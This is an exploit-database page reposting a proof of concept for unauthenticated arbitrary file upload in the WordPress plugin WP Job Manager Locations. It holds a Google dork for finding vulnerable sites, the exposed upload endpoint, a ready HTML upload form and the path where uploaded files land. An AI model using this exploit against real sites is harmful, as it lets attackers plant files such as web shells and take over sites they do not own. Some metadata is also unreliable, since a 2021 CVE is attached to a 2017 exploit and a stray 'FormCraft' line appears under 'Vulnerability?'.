Advertisement






WordPress Plugins WP Job Manager Locations - Arbitrary File Upload

CVE Category Price Severity
CVE-2021-24604 CWE-434 Not specified High
Author Risk Exploitation Type Date
bouhelal High Remote 2017-06-04
CPE
cpe:cpe:/a:wordpress:wp_job_manager
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017060029

Below is a copy:

WordPress Plugins WP Job Manager Locations - Arbitrary File Upload# Exploit Title: WordPress Plugins WP Job Manager Locations - Arbitrary File Upload
# Google Dork: Index of /wp-content/plugins/wp-job-manager-locations
# Date: 4 June 2017
# Exploit Author: AlHikam AM
# Vendor Homepage: https://www.wordpress.org
# Software Link: https://id.wordpress.org/plugins/wp-job-manager-locations/
# Tested on: Windows 7

1. Google Dorking
2. Exploit the websites
https://localhost/jm-ajax/upload_file/
3. Vulnerability?
FormCraft {"files":[]}

4. PoC :
<form method="POST" action="https://localhost/jm-ajax/upload_file/" enctype="multipart/form-data">
<input type="file" name="files[]" />
<button>Upload!</button><br/>
</form>

5. File Access : https://localhost/wp-content/uploads/job-manager-uploads/files/YYYY/MM/your-files.jpg

Great : Indonesian Freedom Security - Base POM303

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.